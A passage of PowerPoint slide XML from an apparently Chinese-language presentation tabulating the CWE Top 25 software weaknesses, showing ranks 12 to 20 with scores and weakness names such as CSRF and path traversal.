                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>73.1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>CWE-250</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Execution with Unnecessary Privileges</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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r>
              <a:tr h="227200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[12]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>70.1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>CWE-352</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Cross-Site Request Forgery (CSRF)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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88" name="Shape 288"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Shape 289"/>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25個常見的CWE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Shape 290"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="291" name="Shape 291"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1487487" y="1412775"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{F200D64E-4686-456C-BBD7-8986DA33EC83}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="761950"/>
                <a:gridCol w="761950"/>
                <a:gridCol w="1246825"/>
                <a:gridCol w="7526425"/>
              </a:tblGrid>
              <a:tr h="116675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Rank</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Score</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>ID</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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r>
              <a:tr h="669350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[13]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>69.3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>CWE-22</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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r>
              <a:tr h="669350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[14]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>68.5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CWE-494</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Download of Code Without Integrity Check</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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r>
              <a:tr h="448275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[15]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>67.8</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>CWE-863</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Incorrect Authorization</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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r>
              <a:tr h="558800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[16]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>66.0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>CWE-829</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Inclusion of Functionality from Untrusted Control Sphere</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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r>
              <a:tr h="337750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[17]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>65.5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>CWE-732</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Incorrect Permission Assignment for Critical Resource</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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r>
              <a:tr h="116675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[18]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>64.6</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>CWE-676</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Use of Potentially Dangerous Function</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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r>
              <a:tr h="227200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[19]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>64.1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>CWE-327</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Use of a Broken or Risky Cryptographic Algorithm</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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r>
              <a:tr h="227200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[20]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>62.4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800" u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>CWE-131</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Incorrect Calculation of Buffer Size</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="7625" marB="7625" marR="7625" marL="762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r>
              <a:tr h="337750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
